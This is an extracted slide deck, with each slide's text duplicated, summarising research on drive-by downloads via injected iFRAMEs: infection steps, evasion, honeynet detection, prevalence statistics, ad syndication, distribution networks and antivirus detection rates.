11

All Your iFRAMEs Point to Us

All Your iFRAMEs Point to Us

Mike BurryMike Burry

22

Drive-by downloadsDrive-by downloads

•Malicious code (typically Javascript)

•Downloaded without user interaction (automatic), just by visiting malicious URL.

•Executable(s) downloaded to client machine without visitors’ knowledge & installed

•Unpatched, vulnerable browsers or plugins

•Traditional defenses are powerless (firewalls, proxies, dynamic addressing) - pull-based

•Malicious code (typically Javascript)

•Downloaded without user interaction (automatic), just by visiting malicious URL.

•Executable(s) downloaded to client machine without visitors’ knowledge & installed

•Unpatched, vulnerable browsers or plugins

•Traditional defenses are powerless (firewalls, proxies, dynamic addressing) - pull-based

33

‘Malicious’ websites are typically victims too

‘Malicious’ websites are typically victims too

•Vulnerable scripting applications (phpBB2) allow direct access to O/S and its web server(s)

• Inject new content via invisible HTML components (0 pixel iFRAME)

•Visitor contributed content (forum, blog) - very dangerous - no web server compromise needed

• ALWAYS sanitize user input!

•Malicious content is typically hosted elsewhere (distribution site)

•Vulnerable scripting applications (phpBB2) allow direct access to O/S and its web server(s)

• Inject new content via invisible HTML components (0 pixel iFRAME)

•Visitor contributed content (forum, blog) - very dangerous - no web server compromise needed

• ALWAYS sanitize user input!

•Malicious content is typically hosted elsewhere (distribution site)

44

Infection ProcessInfection Process

•Visit malicious URL

•Initial exploit script (via iFRAME) downloaded

•Script targets browser or plugin vulnerability

•Exploit results in browser connecting to malware distribution site (typically on different host) to retrieve executable(s).

•Executable is installed on infected system

•Visit malicious URL

•Initial exploit script (via iFRAME) downloaded

•Script targets browser or plugin vulnerability

•Exploit results in browser connecting to malware distribution site (typically on different host) to retrieve executable(s).

•Executable is installed on infected system

55

Avoiding DetectionAvoiding Detection

•Hidden from view on website (iFRAME)

•Javascript obfuscation

•Multiple redirections before contacting malware distribution site

•Hidden from view on website (iFRAME)

•Javascript obfuscation

•Multiple redirections before contacting malware distribution site

66

Scanning/Verification Process

Scanning/Verification Process

•Large honeynet simultaneously runs many MS Windows VM’s

• Each running unpatched IE instances

•Combination of:• Execution based heuristics

• run for ~2 minutes - monitor: file system / processes / registry

• Anti-virus engines to check HTTP responses

• A score is assigned to all URLs & threshold set

•Large honeynet simultaneously runs many MS Windows VM’s

• Each running unpatched IE instances

•Combination of:• Execution based heuristics

• run for ~2 minutes - monitor: file system / processes / registry

• Anti-virus engines to check HTTP responses

• A score is assigned to all URLs & threshold set

77

How Common are D-BD’s?

How Common are D-BD’s?

Data collection period Jan - Oct 2007 (10 months)

Total URLs checked (in-depth)

66,534,330

Unique suspicious URLs 3,385,889

Unique malicious URLs 3,417,590

Unique malicious sites 181,699

Unique distribution sites 9,340

*Malicious: meets threshold AND one of the incoming HTTP responses is marked as malicious by at least one anti-virus scanner

*Suspicious: meets threshold BUT none of the incoming HTTP responses are marked as malicious by any anti-virus scanner

approx. 1 million URLs daily / 25k flagged as maliciousapprox. 1 million URLs daily / 25k flagged as malicious

88

Potential Impact on End-User

Potential Impact on End-User

•Nearly 1.3% of Google’s search queries return at least one malicious result

• About 0.6% of the top million URLs that appeared most frequently in Google's search results led to exposure of malicious activity at some point.

•“Gray content” (Adult) sites have a higher risk (0.6+% vs 0.2-0.35%) -- 2-3 times more common.

•Other functional categories on the Web have about equal distribution

• “Safe browsing” helps, but is not an effective safeguard

•Nearly 1.3% of Google’s search queries return at least one malicious result

• About 0.6% of the top million URLs that appeared most frequently in Google's search results led to exposure of malicious activity at some point.

•“Gray content” (Adult) sites have a higher risk (0.6+% vs 0.2-0.35%) -- 2-3 times more common.

•Other functional categories on the Web have about equal distribution

• “Safe browsing” helps, but is not an effective safeguard

99

Geography of Malicious Sites

Geography of Malicious Sites

•96% of landing sites in China point to malware distribution servers located in same country

•Remaining distribution/landing sites (~10%) spread out across globe

•96% of landing sites in China point to malware distribution servers located in same country

•Remaining distribution/landing sites (~10%) spread out across globe

Distribution. Sitehosting country

% of all distribution sites

Landing site hosting country

% of all landing sites

China 67% China 64.4%

US 15% US 15.6%

Russia 4% Russia 5.6%

Malaysia 2% Korea 2%

Korea 2% Germany 2%

1010

Web Server SoftwareWeb Server Software

•A significant # of landing sites are running outdated software with well known vulnerabilities.

• 38% of Apache servers had known vulnerabilities

• 40% of servers with PHP support had known vulnerabilities

•A significant # of landing sites are running outdated software with well known vulnerabilities.

• 38% of Apache servers had known vulnerabilities

• 40% of servers with PHP support had known vulnerabilities

1111

Ad SyndicationAd Syndication•Majority of Web advertisements are distributed

in the form of 3rd party content (Ad syndication)

•A web page is only as secure as its weakest component

• A “secure” site with insecure ads is insecure

•2% of landing pages delivered malware via ads

• 75% of these landing pages use multiple levels of syndication

•Ads appear on 1,000’s of websites instantaneously

• Very easy way to inject content to large visitor base without need to compromise any web server. Large impact, but short lived.

•Majority of Web advertisements are distributed in the form of 3rd party content (Ad syndication)

•A web page is only as secure as its weakest component

• A “secure” site with insecure ads is insecure

•2% of landing pages delivered malware via ads

• 75% of these landing pages use multiple levels of syndication

•Ads appear on 1,000’s of websites instantaneously

• Very easy way to inject content to large visitor base without need to compromise any web server. Large impact, but short lived.

1212

Distribution NetworksDistribution Networks

•Distribution Network = all the landing sites which point to a single distribution site

•Vast majority were subdomains on free hosting services or short-lived domains created in bulk

•Networks range from sizes of 1 to over 21,000

• 45% have only 1 landing site

• Is this to avoid detection?

•Distribution Network = all the landing sites which point to a single distribution site

•Vast majority were subdomains on free hosting services or short-lived domains created in bulk

•Networks range from sizes of 1 to over 21,000

• 45% have only 1 landing site

• Is this to avoid detection?

1313

Distribution Networks (cont.)

Distribution Networks (cont.)

•42% deliver only a single malware binary, while 3% had over 100.

•80% of networks share at least 1 landing page

• Several landing pages have multiple iFRAMES to different distribution sites

• Easy targets?

•42% deliver only a single malware binary, while 3% had over 100.

•80% of networks share at least 1 landing page

• Several landing pages have multiple iFRAMES to different distribution sites

• Easy targets?

1414

Post Infection ImpactPost Infection Impact

•On average, 8 downloads occur

• Up to 60 downloads has been observed

•Increase in # of running processes on VM

•58% of landing pages caused registry changes

•On average, 8 downloads occur

• Up to 60 downloads has been observed

•Increase in # of running processes on VM

•58% of landing pages caused registry changesCategory BHO Preferences Security Startup

URL % 7% 24% 36% 51%

*BHO: Browser Helper Object (privileged state)*BHO: Browser Helper Object (privileged state)*Preferences: Homepage / search engine / name server changes*Preferences: Homepage / search engine / name server changes*Security: Firewall settings / disable automatic updates*Security: Firewall settings / disable automatic updates*Startup: Persist across reboots*Startup: Persist across reboots

1515

Post Infection Impact (cont.)

Post Infection Impact (cont.)

•Network activity

• 87%: HTTP (ports 80 & 8080) due to binary downloads

• 8.3%: IRC (6660 - 7001) account for more than 50% of all non-HTTP traffic. Most likely adding to botnet.

• < 1 %: FTP (21), UPnP (1900), Mail (25)

• 2.25%: Other ports combined

•Network activity

• 87%: HTTP (ports 80 & 8080) due to binary downloads

• 8.3%: IRC (6660 - 7001) account for more than 50% of all non-HTTP traffic. Most likely adding to botnet.

• < 1 %: FTP (21), UPnP (1900), Mail (25)

• 2.25%: Other ports combined

1616

Anti-Virus Detection Rates

Anti-Virus Detection Rates

•The best AV engine tested (out of 3) successfully detected an average of 70% of malware.

•The worst AV engine detected approx. 25%.

•The best AV engine tested (out of 3) successfully detected an average of 70% of malware.

•The worst AV engine detected approx. 25%.